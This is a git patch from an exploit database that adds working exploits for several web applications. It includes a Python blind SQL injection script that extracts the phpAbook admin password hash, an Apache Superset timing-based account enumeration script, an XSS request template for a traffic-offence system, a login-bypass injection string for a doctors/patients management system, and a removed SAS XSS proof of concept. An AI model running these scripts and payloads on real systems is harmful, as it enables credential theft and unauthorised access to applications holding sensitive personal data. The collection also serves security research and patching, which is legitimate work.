From 293ca2aadb8c3cf63598b433b85ea25d300b4581 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 1 Jul 2021 05:01:57 +0000 Subject: [PATCH] DB: 2021-07-01 6 changes to exploits/shellcodes SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) phpAbook 0.9i - SQL Injection Apache Superset 1.1.0 - Time-Based Account Enumeration Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS) --- exploits/multiple/webapps/50067.txt | 28 ------------- exploits/multiple/webapps/50072.py | 64 +++++++++++++++++++++++++++++ exploits/multiple/webapps/50073.txt | 38 +++++++++++++++++ exploits/php/webapps/50071.py | 38 +++++++++++++++++ exploits/php/webapps/50074.txt | 14 +++++++ files_exploits.csv | 5 ++- 6 files changed, 158 insertions(+), 29 deletions(-) delete mode 100644 exploits/multiple/webapps/50067.txt create mode 100755 exploits/multiple/webapps/50072.py create mode 100644 exploits/multiple/webapps/50073.txt create mode 100755 exploits/php/webapps/50071.py create mode 100644 exploits/php/webapps/50074.txt diff --git a/exploits/multiple/webapps/50067.txt b/exploits/multiple/webapps/50067.txt deleted file mode 100644 index ff24e28c9..000000000 --- a/exploits/multiple/webapps/50067.txt +++ /dev/null @@ -1,28 +0,0 @@ -# Exploit Title: SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS) -# Date: 24/06/2021 -# Exploit Author: Luqman Hakim Zahari @ Saitamang -# Vendor Homepage: https://support.sas.com/en/software/environment-manager-support.html -# Version: 2.5 -# Tested on: CentOS 7 -# CVE : CVE-2021-35475 - -# Description # - -SAS® Environment Manager 2.5 allows XSS through the Name field when creating/editing a server. The XSS will prompt when editing the Configuration Properties. - -# Proof of Concept(PoC) # https://github.com/saitamang/CVE-2021-35475/blob/main/README.md - -*Steps to Reproduce:* - -[1.] Login to your system > On "Resource" tab > "Browse"" -[2.] Choose a "Platform" -[3.] Click "Inventory" tab > Under "Servers" tab click "New..." -[4.] Under "General Properties" tab on "Name" field , enter the payload(below) > Filled up other information and click "Ok" button - -payload : - -name=XSS">@SAITAMANG - -[5.] Successfully saved the payload page will shown -[6.] Then scroll down to bottom under "Configuration Properties" tab > click "Edit" button -[7.] Then the payload will be executed \ No newline at end of file diff --git a/exploits/multiple/webapps/50072.py b/exploits/multiple/webapps/50072.py new file mode 100755 index 000000000..995b2e9bf --- /dev/null +++ b/exploits/multiple/webapps/50072.py @@ -0,0 +1,64 @@ +# Exploit Title: Apache Superset 1.1.0 - Time-Based Account Enumeration +# Author: Dolev Farhi +# Date: 2021-05-13 +# Vendor Homepage: https://superset.apache.org/ +# Version: 1.1.0 +# Tested on: Ubuntu + +import sys +import requests +import time + +scheme = 'http' +host = '192.168.1.1' +port = 8080 + +# change with your wordlist +usernames = ['guest', 'admin', 'administrator', 'idontexist', 'superset'] + +url = '{}://{}:{}'.format(scheme, host, port) +login_endpoint = '/login/' + +session = requests.Session() + +def get_csrf(): + token = None + r = session.get(url + login_endpoint, verify=False) + + for line in r.text.splitlines(): + if 'csrf_token' in line: + try: + token = line.strip().split('"')[-2] + except: + pass + return token + +csrf_token = get_csrf() + +if not csrf_token: + print('Could not obtain CSRF token, the exploit will likely fail.') + sys.exit(1) + +data = { + 'csrf_token':csrf_token, + 'username':'', + 'password':'abc' +} + +attempts = {} +found = False + +for user in usernames: + start = time.time() + data['username'] = user + r = session.post(url + login_endpoint, data=data, verify=False, allow_redirects=True) + roundtrip = time.time() - start + attempts["%.4f" % roundtrip] = user + +print('[!] Accounts existence probability is sorted from high to low') + +count = 0 + +for key in sorted(attempts, reverse=True): + count += 1 + print("%s. %s (timing: %s)" % (count, attempts[key], key)) \ No newline at end of file diff --git a/exploits/multiple/webapps/50073.txt b/exploits/multiple/webapps/50073.txt new file mode 100644 index 000000000..8affacfd8 --- /dev/null +++ b/exploits/multiple/webapps/50073.txt @@ -0,0 +1,38 @@ +# Exploit Title: Simple Traffic Offense System 1.0 - 'Multiple' Stored Cross Site Scripting (XSS) +# Date: 30-06-2021 +# Exploit Author: Barış Yıldızoğlu +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/trafic.zip +# Version: 1.0 +# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 + +# Description: Almost all inputs contain Stored XSS on the website + +Request: + +POST /Trafic/save-reported.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 +Firefox/78.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 168 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/Trafic/report-offence.php +Cookie: PHPSESSID=vbsq5n2m09etst1mfcmq84gifo +Upgrade-Insecure-Requests: 1 + +offence_id={Payload here}&vehicle_no={Payload here}&driver_license={Payload +here}&name={Payload here}&address={Payload here}&gender={Payload +here}&officer_reporting={Payload here}&offence={Payload here} + + +# Steps to Reproduce: +[1.] Login to the system [+] username=Torrahclef&pass=yemiyemi +[2.] Go to the Report Offense page +[3.] Send the request above with the Stored XSS payload +[4.] Dashboard and Offense list pages will be triggered \ No newline at end of file diff --git a/exploits/php/webapps/50071.py b/exploits/php/webapps/50071.py new file mode 100755 index 000000000..9d15045c2 --- /dev/null +++ b/exploits/php/webapps/50071.py @@ -0,0 +1,38 @@ +# Exploit Title: phpAbook 0.9i - SQL Injection +# Date: 2021-06-29 +# Vendor Homepage: http://sourceforge.net/projects/phpabook/ +# Exploit Author: Said Cortes, Alejandro Perez +# Version: v0.9i +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +import requests +import argparse +import string +import sys + + +def exploit(session,host): + print("Starting Exploit\nSearching Admin Hash...") + passwordhash = '' + for i in range(1,33): + charset = string.digits + string.ascii_lowercase + for letter in charset: + burp0_url = f"{host}/index.php" + burp0_data = {"auth_user": f"admin'-IF((SELECT MID(password,{i},1) from ab_auth_user where uid=1)='{letter}',SLEEP(3),0)#", "auth_passwd": "admin", "lang": "en", "submit": "Login"} + try: + session.post(burp0_url, data=burp0_data, timeout=1) + except requests.Timeout: + passwordhash += letter + continue + print("admin:"+passwordhash) + + + + +if __name__ == "__main__" : + session = requests.session() + parser = argparse.ArgumentParser() + parser.add_argument("-u","--url",help="host url \nex: http://127.0.0.1/phpabook",required=True) + arg = parser.parse_args() + exploit(session,arg.url) \ No newline at end of file diff --git a/exploits/php/webapps/50074.txt b/exploits/php/webapps/50074.txt new file mode 100644 index 000000000..e32dd34b4 --- /dev/null +++ b/exploits/php/webapps/50074.txt @@ -0,0 +1,14 @@ +# Exploit Title: Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass) +# Date: 06/30/2021 +# Exploit Author: Murat DEMIRCI (butterflyhunt3r) +# Vendor Homepage: https://www.codester.com/ +# Software Link: https://www.codester.com/items/31349/medisol-doctors-patients-managment-system +# Version: 1.0 +# Tested on: Windows 10 +# Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. + +# Proof of Concept : +http://test.com/PATH/signin + +# Username : anything +# Password : ' or '1'='1 \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 9f234fed9..8d9dcac83 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -44207,6 +44207,9 @@ id,file,description,date,author,type,platform,port 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",2021-06-25,"Barış Yıldızoğlu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php, 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",2021-06-28,"Toby Jackson",webapps,php, -50067,exploits/multiple/webapps/50067.txt,"SAS Environment Manager 2.5 - 'name' Stored Cross-Site Scripting (XSS)",2021-06-28,"Luqman Hakim Zahari",webapps,multiple, +50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",2021-06-30,"Murat DEMİRCİ",webapps,php, 50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",2021-06-28,Captain_hook,webapps,macos, 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",2021-06-28,"Bryan Leong",webapps,hardware, +50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",2021-06-30,"Alejandro Perez",webapps,php, +50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",2021-06-30,"Dolev Farhi",webapps,multiple, +50073,exploits/multiple/webapps/50073.txt,"Simple Traffic Offense System 1.0 - Stored Cross Site Scripting (XSS)",2021-06-30,"Barış Yıldızoğlu",webapps,multiple,